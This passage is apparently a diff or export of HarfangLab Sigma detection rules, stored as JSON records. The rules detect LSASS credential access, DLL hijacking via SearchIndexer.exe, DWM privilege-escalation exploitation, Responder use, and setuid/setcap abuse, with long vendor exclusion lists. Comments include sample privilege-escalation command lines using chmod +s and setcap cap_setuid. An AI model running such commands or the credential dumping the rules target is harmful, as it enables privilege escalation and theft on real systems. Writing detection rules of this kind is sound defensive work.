Generally, LegalCopyright and/or CompanyName is set\n ProcessImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_no_info:\n # In case the agent doesn't know the process info.\n ProcessImphash: '00000000000000000000000000000000'\n\n # Lot of softwares (including Microsoft owns one) do read the image path off the PEB. (inside _RTL_USER_PROCESS_PARAMETERS)\n # This is usually to grab the proces list.\n exclusion_signed_peb_read:\n ProcessSigned: 'true'\n GrantedAccess:\n - '0x1010'\n - '0x1410'\n exclusion_waptpython:\n # WAPT is an open source management tool in python that is unsigned.\n CallTrace|contains: 'python27.dll'\n ProcessProcessName: 'waptpython.exe'\n GrantedAccess: '0x1410'\n exclusion_trendmicro:\n # Trend Micro have a lot of different apps.\n ProcessSignature: 'Trend Micro, Inc.'\n exclusion_synology:\n # Some of their software use an have expired certificate.\n #CallTrace|contains: 'UsbClientService.exe'\n #ProcessProcessName: 'UsbClientService.exe'\n # seen versions from 2011 without signature or any internal name, and no usbclientservice.exe occurences in the callstack\n ProcessImage: '?:\\Program Files (x86)\\Synology\\Assistant\\UsbClientService.exe'\n #ProcessSignature: 'Synology Inc.'\n GrantedAccess: '0x1410'\n exclusion_dell_sre:\n CallTrace|contains: 'ProcBy.dll'\n ProcessProcessName: 'SRE.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sutherland Global Services Inc'\n - 'Sutherland Global Services Private Limited'\n GrantedAccess:\n - '0x1fffff'\n - '0x12f4d0'\n exclusion_g:\n CallTrace|contains: 'nfapi.dll'\n ProcessProcessName: 'DnsCloudClientHost64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'G DATA Software AG'\n - 'G DATA CyberDefense AG'\n GrantedAccess: '0x1f3fff'\n exclusion_conexant_universal_device_install_uninstall:\n CallTrace|contains: 'KUIU.EXE'\n ProcessProcessName: 'KUIU.EXE'\n ProcessSigned: 'true'\n 
ProcessSignature: 'Conexant Systems, Inc.'\n GrantedAccess: '0x12f4d0'\n exclusion_rsa_net_witness:\n CallTrace|contains: 'NWEAgent.exe'\n ProcessProcessName: 'NWEAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'RSA Security LLC'\n GrantedAccess: '0x1fffff'\n exclusion_adobe_arm:\n ProcessProcessName: 'AdobeARMHelper.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Systems, Incorporated'\n - 'Adobe Inc.'\n exclusion_alibaba_uninstaller:\n ProcessImage|endswith: '\\Uninstall.exe'\n ProcessSignature: 'Alibaba (China) Network Technology Co.,Ltd.'\n GrantedAccess: '0x12f4d0'\n exclusion_iobit_setup:\n ProcessSignature: 'IObit CO., LTD'\n ProcessDescription: 'Setup/Uninstall'\n GrantedAccess: '0x12f4d0'\n exclusion_oxalys_tools:\n ProcessImage|endswith:\n - '\\OXATOOLS.exe'\n - '\\oxatools64.exe'\n ProcessCompany:\n - 'Oxalys Technologies'\n - 'Oxalys'\n ProcessDescription:\n - 'OXATOOLS'\n - 'Oxatools 64'\n ProcessProduct:\n - 'OXATOOLS'\n - 'OXATOOLS64'\n GrantedAccess: '0x1410'\n exclusion_ossec:\n CallTrace|contains|all:\n - 'ossec-agent'\n - 'ossec-agent.exe'\n ProcessProcessName: 'ossec-agent.exe'\n GrantedAccess: '0x1fffff'\n exclusion_wazuh:\n - ProcessImage: '?:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe'\n - ProcessProcessName: 'ossec-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Wazuh, Inc'\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfeesp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe'\n - 'mfetp.exe'\n - 'VsTskMgr.exe'\n - 'Scan64.exe'\n - 'shstat.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n exclusion_ocssetup:\n ProcessProcessName: 'OcsSetup.exe'\n ProcessDescription: 'OCS Inventory NG Agent'\n exclusion_cyland_pos_service:\n ProcessProcessName: 'PosService.exe'\n ProcessCompany: 'Cylande'\n GrantedAccess: '0x1410'\n exclusion_seiko_epson_escsvc64:\n ProcessProcessName: 'escsvc64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEIKO EPSON CORPORATION'\n GrantedAccess: '0x101410'\n 
exclusion_google_update:\n # for instance, ..C:\\Program Files (x86)\\Google\\Temp\\GUM8660.tmp\\goopdate.dll+16b4e..\n # to handle chrome installed in user appdata, match only on google\\temp\n GrantedAccess: '0x1410'\n CallTrace: '*\\Google\\Temp\\GUM????.tmp\\goopdate.dll*'\n exclusion_adobe:\n # C:\\Program Files (x86)\\Adobe\\Adobe Sync\\CoreSync\\customhook\\CoreSyncCustomHook.exe\n # C:\\Program Files (x86)\\Common Files\\Adobe\\CoreSyncExtension\\customhook\\CoreSyncCustomHook.exe\n ProcessImage:\n - '?:\\Program Files (x86)\\Adobe\\Adobe Sync\\CoreSync\\\\*'\n - '?:\\Program Files (x86)\\Common Files\\Adobe\\CoreSyncExtension\\\\*'\n\n exclusion_battleeye:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\BattlEye\\BEService.exe'\n\n exclusion_symantec:\n ProcessImage: '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\bin\\SysUtil.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_windev_32bits:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n # WinDev 26 standard library\n - 'wd260std.DLL'\n # WinDev 26 VM\n - 'wd260vm.DLL'\n\n exclusion_windev_64bits:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n # WinDev 26 standard library\n - 'wd260std64.DLL'\n # WinDev 26 VM\n - 'wd260vm64.DLL'\n\n exclusion_easeus:\n ProcessImage:\n - '?:\\Program Files (x86)\\EaseUS\\Todo Backup\\bin\\TodoBackupService.exe'\n - '?:\\Program Files (x86)\\EaseUS\\ENS\\ensserver.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CHENGDU YIWO Tech Development Co., Ltd.'\n\n exclusion_watchguard:\n ProcessImage: '?:\\Program Files (x86)\\WatchGuard\\WatchGuard Mobile VPN with SSL\\wgsslvpnsrc.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\WatchGuard\\WatchGuard Mobile VPN with SSL\\wgsslvpnsrc.exe'\n\n exclusion_writedescexecutefilename:\n # C:\\Windows\\Temp\\{368361DA-CBF9-4A07-90CB-2CFF91E36DCC}\\WriteDescExecuteFileName.exe\n ProcessImage: '*\\WriteDescExecuteFileName.exe'\n ProcessSigned: 'true'\n 
ProcessSignature: 'Samsung Electronics CO., LTD.'\n GrantedAccess: '0x153b'\n\n exclusion_xerox:\n ProcessImage: '?:\\Xerox\\Docushare\\IDOLServer\\IDOL\\AutonomyIDOLServer.exe'\n CallTrace|contains: '|?:\\Xerox\\Docushare\\IDOLServer\\IDOL\\AutonomyIDOLServer.exe+'\n GrantedAccess: '0x1410'\n\n exclusion_metricbeat:\n ProcessImage: '?:\\Program Files\\Metricbeat\\metricbeat.exe'\n ProcessCompany: ''\n ProcessDescription: ''\n ProcessProduct: ''\n CallTrace|contains: '|?:\\Program Files\\Metricbeat\\metricbeat.exe+?????'\n GrantedAccess: '0x1010'\n\n exclusion_zabbix:\n ProcessImage|endswith: '\\zabbix_agentd.exe'\n CallTrace|endswith:\n - '\\zabbix_agentd.exe+?????|?:\\Windows\\System32\\kernel32.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????'\n - '\\zabbix_agentd.exe+?????|?:\\Windows\\System32\\kernel32.dll+????|?:\\Windows\\System32\\ntdll.dll+?????'\n - '\\zabbix_agentd.exe+?????'\n GrantedAccess: '0x1410'\n\n exclusion_oracle_rman:\n ProcessImage|endswith: '\\app\\product\\\\*\\dbhome\\bin\\rman.exe'\n\n exclusion_oracle_dll:\n GrantedAccess: '0x1410'\n # d:\\oracle\\product\\12.2.0\\client_1\\bin\\orannzsbb12.dll\n # E:\\oracle\\product\\12.2.0\\cl32\\bin\\orannzsbb12.dll+\n # E:\\Oracle_client19\\product\\19.0.0\\client_1\\bin\\orannzsbb19.dll\n CallTrace|contains:\n - '\\bin\\orannzsbb??.dll'\n - '\\bin\\oracrf??.dll'\n - '\\bin\\oracore??.dll'\n\n exclusion_xampp:\n # C:\\xampp\\xampp-control.exe\n # no PE metadata information so we must use the SHA256\n ProcessSha256: '1400812815452aa93ab1e051b11f8062ace7bc95e50a91cc3479ba64ed847dde'\n\n exclusion_manageengine:\n ProcessImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\appctrl\\bin\\VerifyTrustedFiles.exe'\n\n exclusion_nagios:\n ProcessImage: '?:\\Program Files (x86)\\Nagios\\NCPA\\ncpa_passive.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Nagios\\NCPA\\python27.dll+'\n\n exclusion_hewlett_packard:\n ProcessImage: '?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools 
WebGUI\\bin\\DeviceAnalysisService.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe+'\n\n exclusion_streaming_runtime:\n ProcessImage: '?:\\Program Files\\Streaming Runtime Service\\pxr_srs_launcher.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe+'\n GrantedAccess: '0x1fffff'\n ProcessSigned: 'true'\n ProcessSignature: 'Qingdao Pico Technology Co.,Ltd.'\n\n exclusion_watchguard_2:\n ProcessImage: '?:\\WatchGuard\\wgsslvpnsrc.exe'\n CallTrace|contains: '|?:\\WatchGuard\\wgsslvpnsrc.exe+'\n GrantedAccess: '0x1f3fff'\n ProcessSigned: 'true'\n ProcessSignature: 'WatchGuard Technologies'\n\n exclusion_moneweb:\n ProcessImage|endswith: '\\Moneweb\\GoldenGatesrvmweb_??\\mgr.exe'\n CallTrace|contains: '\\Moneweb\\GoldenGatesrvmweb_??\\mgr.exe+'\n GrantedAccess: '0x1410'\n\n exclusion_equitrac:\n ProcessImage: '?:\\Program Files\\Equitrac\\Shared Services\\Caching\\bin\\sigar_port.exe'\n CallTrace|contains: '?:\\Program Files\\Equitrac\\Shared Services\\Caching\\bin\\sigar.dll'\n\n exclusion_mactype:\n ProcessImage: '?:\\program files\\mactype\\mt64agnt.exe'\n\n exclusion_svc_mgr_alcatel:\n ProcessImage: '?:\\8770\\bin\\svc_mgr.exe'\n\n exclusion_kill_ciril:\n ProcessImage|endswith:\n - '\\ciril\\prod\\util_unix\\kill.exe'\n - '\\ciril\\prod\\util_unix\\pskill.exe'\n - '\\ciril\\prod\\utilitaires\\expl\\kill_processus.exe'\n - '\\ciril\\net\\cgi-bin\\document.exe'\n - '\\ciril\\net\\cgi-bin\\irename.exe'\n - '\\ciril\\net\\cgi-bin\\lirepjfaccpp.exe'\n\n exclusion_hardis_saas:\n ProcessImage: '?:\\hardis\\saas-mgr\\saas-mgr.exe'\n ProcessGrandparentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_appdynamics:\n ProcessImage: '?:\\ProgramData\\AppDynamics\\agents\\machineagent\\bin\\MachineAgentService.exe'\n ProcessGrandparentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_rufus:\n 
ProcessProcessName: 'rufus-?.?.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Akeo Consulting'\n GrantedAccess: '0x1450'\n\n exclusion_nokia_vitalsuite:\n ProcessImage|endswith:\n - '\\VSCommon\\Program\\vnStatusKill.exe'\n - '\\VitalNet\\Program\\aggrun.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "053fc596-ebe0-4ab6-9d82-691fec399375", + "rule_name": "LSASS Accessed by Process Without PE Metadata Information", + "rule_description": "Detects the suspicious open of lsass.exe by a process without PE metadata information (original name and internal name).\nThis can be indicative of an attempt to dump LSASS' memory for privilege escalation purposes.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nIt is recommended to analyze the source process for malicious content, to check its legitimacy and origin and to start memory forensics to determine stolen credentials.\n", + "rule_creation_date": "2021-06-07", + "rule_modified_date": "2026-02-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1003.001", + "attack.t1078" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0551aa79-1306-43bb-9b6d-df4f7837d107", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.596475Z", + "creation_date": "2026-03-23T11:45:34.596485Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.596500Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://x.com/dez_/status/1790807116363481415", + "https://securelist.com/cve-2024-30051/112618/", + "https://attack.mitre.org/techniques/T1068/" + ], + "name": "t1068_dwm_launch_process.yml", + "content": "title: Suspicious Child Process Launched by DWM.exe\nid: 0551aa79-1306-43bb-9b6d-df4f7837d107\ndescription: |\n Detects a suspicious process launched by dwm.exe.\n Adversaries have been observed exploiting vulnerabilities in DWM in order to escalate privileges. 
As result of a successful exploitation, the DWM.exe process launch a child process with System privileges.\n It is recommended to check actions made by the newly created process for suspicious activity.\nreferences:\n - https://x.com/dez_/status/1790807116363481415\n - https://securelist.com/cve-2024-30051/112618/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/07/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2024-30051\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\dwm.exe'\n\n filter_known_children:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\ISM.exe'\n - '?:\\Windows\\System32\\dwm.exe'\n - '?:\\Windows\\System32\\dgcvideo.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0551aa79-1306-43bb-9b6d-df4f7837d107", + "rule_name": "Suspicious Child Process Launched by DWM.exe", + "rule_description": "Detects a suspicious process launched by dwm.exe.\nAdversaries have been observed exploiting vulnerabilities in DWM in order to escalate privileges. 
As result of a successful exploitation, the DWM.exe process launch a child process with System privileges.\nIt is recommended to check actions made by the newly created process for suspicious activity.\n", + "rule_creation_date": "2024-07-23", + "rule_modified_date": "2025-04-08", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1068" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "05797331-a902-41f3-8dd3-3e0f5cc17d73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.595136Z", + "creation_date": "2026-03-23T11:45:34.595139Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.595147Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/", + "https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_searchindexer.yml", + "content": "title: DLL Hijacking 
via SearchIndexer.exe\nid: 05797331-a902-41f3-8dd3-3e0f5cc17d73\ndescription: |\n Detects potential Windows DLL Hijacking via SearchIndexer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SearchIndexer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msftedit.dll'\n - '\\mstracer.dll'\n - '\\msfte.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "05797331-a902-41f3-8dd3-3e0f5cc17d73", + "rule_name": "DLL 
Hijacking via SearchIndexer.exe", + "rule_description": "Detects potential Windows DLL Hijacking via SearchIndexer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "058378a0-6b19-4ce5-86a4-9bd8a453e8ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.619415Z", + "creation_date": "2026-03-23T11:45:34.619416Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.619421Z", + "rule_level": "critical", + 
"rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/SpiderLabs/Responder", + "https://github.com/lgandx/Responder", + "https://attack.mitre.org/software/S0174/" + ], + "name": "t1557_001_responder_usage.yml", + "content": "title: Responder Executed\nid: 058378a0-6b19-4ce5-86a4-9bd8a453e8ad\ndescription: |\n Detects Responder, an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\n Attackers can use this tool for credential access, privilege escalation and lateral movement.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://github.com/SpiderLabs/Responder\n - https://github.com/lgandx/Responder\n - https://attack.mitre.org/software/S0174/\ndate: 2024/09/26\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.Responder\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine: 'sh -c */certs/gen-self-signed-cert.sh >/dev/null 2>&1'\n\n condition: selection\nlevel: critical\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "058378a0-6b19-4ce5-86a4-9bd8a453e8ad", + "rule_name": "Responder Executed", + "rule_description": "Detects Responder, an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\nAttackers can use this tool for credential access, privilege escalation and lateral movement.\nIt is recommended to verify if the usage of this tool is 
legitimate.\n", + "rule_creation_date": "2024-09-26", + "rule_modified_date": "2025-02-05", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.collection", + "attack.credential_access", + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1040", + "attack.t1557.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "058b2e5d-6e8a-4289-bfb7-96a9cc306c0f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-24T07:14:08.594725Z", + "creation_date": "2026-03-23T11:45:34.623356Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.623360Z", + "rule_level": "high", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md", + "https://attack.mitre.org/techniques/T1548/001/" + ], + "name": "t1548_001_chmod_setuid_linux.yml", + "content": "title: SetUID Access Flag Set via chmod/setcap\nid: 058b2e5d-6e8a-4289-bfb7-96a9cc306c0f\ndescription: |\n Detects when chmod or setcap are used to set the SetUID bit or capability on a file.\n This could be used by an attacker to execute a 
file with a different (and potentially more privileged) user context.\n It is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2022/09/26\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.001\n - attack.t1222.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Chmod\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_chmod:\n # chmod +s /home/user/malicious_script.sh\n # chmod ug+s /home/user/malicious_script.sh\n # chmod u+s /home/user/malicious_script.sh\n # chmod 2644 /home/user/malicious_script.sh\n # chmod 6644 /home/user/malicious_script.sh\n Image|endswith: '/chmod'\n CommandLine|contains:\n - ' +s'\n - 'ug+s'\n - 'u+s'\n - ' 4??? '\n - ' 6??? '\n ParentImage|contains: '?'\n\n selection_setcap:\n # setcap cap_setuid=pe /home/user/malicious_script.sh\n # setcap cap_setuid=e /home/user/malicious_script.sh\n # setcap cap_setuid=+pie /home/user/malicious_script.sh\n # setcap cap_net_bind_service,cap_setuid=pe /home/user/malicious_script.sh\n # setcap cap_setuid,cap_setgid=+pie /home/user/malicious_script.sh\n Image|endswith: '/setcap'\n CommandLine|contains: 'cap_setuid'\n ParentImage|contains: '?'\n\n exclusion_octal:\n CommandLine|startswith: 'chmod ??? 
/'\n\n exclusion_dpkg:\n - ParentImage: '/usr/bin/dpkg'\n - GrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_suexec:\n CommandLine: 'chmod 4510 /usr/sbin/suexec'\n ParentCommandLine: '/bin/bash /usr/lib64/plesk-?.?/install_suexec'\n\n exclusion_virtualbox:\n CommandLine:\n - 'chmod 4511 /usr/lib/virtualbox/VBoxVolInfo'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetAdpCtl'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetNAT'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetDHCP'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxHeadless'\n - 'chmod 4511 /usr/lib/virtualbox/VirtualBoxVM'\n ParentCommandLine: '/bin/sh /var/lib/dpkg/info/virtualbox-*.postinst configure*'\n\n exclusion_yocto_sdk:\n # chmod o-x,u+s /opt/yocto/yocto-new/build/...\n # chmod 4755 /opt/yocto/kirkstone/build..\n # chmod 4111 /opt/yocto/yocto-new/build/tmp...\n CommandLine: 'chmod * /opt/yocto/*'\n\n exclusion_vtom:\n CommandLine:\n - 'chmod 4755 /opt/vtom/manager/bin/vtmanager'\n - 'chmod 4755 /opt/vtom/abm/bin/bdaemon'\n\n exclusion_isa:\n ParentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n exclusion_bitdefender:\n # /bin/sh /var/lib/dpkg/info/bitdefender-security-tools.postinst configure 7.0.5-200090\n CommandLine: 'chmod +s /opt/bitdefender-security-tools/bin/auctl'\n ParentCommandLine|startswith: '/bin/sh /var/lib/dpkg/info/bitdefender-security-tools.postinst configure'\n\n exclusion_nxserver:\n CommandLine|contains:\n - ' /etc/nx/nxserver'\n - ' /usr/nx/scripts'\n ParentCommandLine|startswith:\n - '/bin/bash /usr/nx/scripts/setup/nxserver'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxserver'\n - '/bin/bash /usr/nx/scripts/setup/nxnode'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxnode'\n - '/bin/bash /usr/nx/scripts/setup/nxrunner'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxrunner'\n\n exclusion_apt:\n GrandparentImage:\n - '/usr/bin/apt-get'\n - '/usr/bin/apt'\n\n exclusion_dnf:\n - GrandparentImage: '/usr/bin/dnf5'\n - 
ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_rpm:\n ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_netdata:\n - GrandparentCommandLine: '/bin/sh /etc/cron.daily/netdata-updater'\n - CommandLine|startswith: 'chmod 4750 usr/libexec/netdata/plugins.d/'\n ParentCommandLine|startswith: './bin/bash system/install-or-update.sh '\n\n exclusion_yum:\n GrandparentCommandLine|startswith: '/usr/bin/python /bin/yum '\n\n exclusion_make:\n - ParentImage: '/usr/bin/make'\n - GrandparentImage: '/usr/bin/make'\n\n exclusion_sap:\n CommandLine: 'chmod * 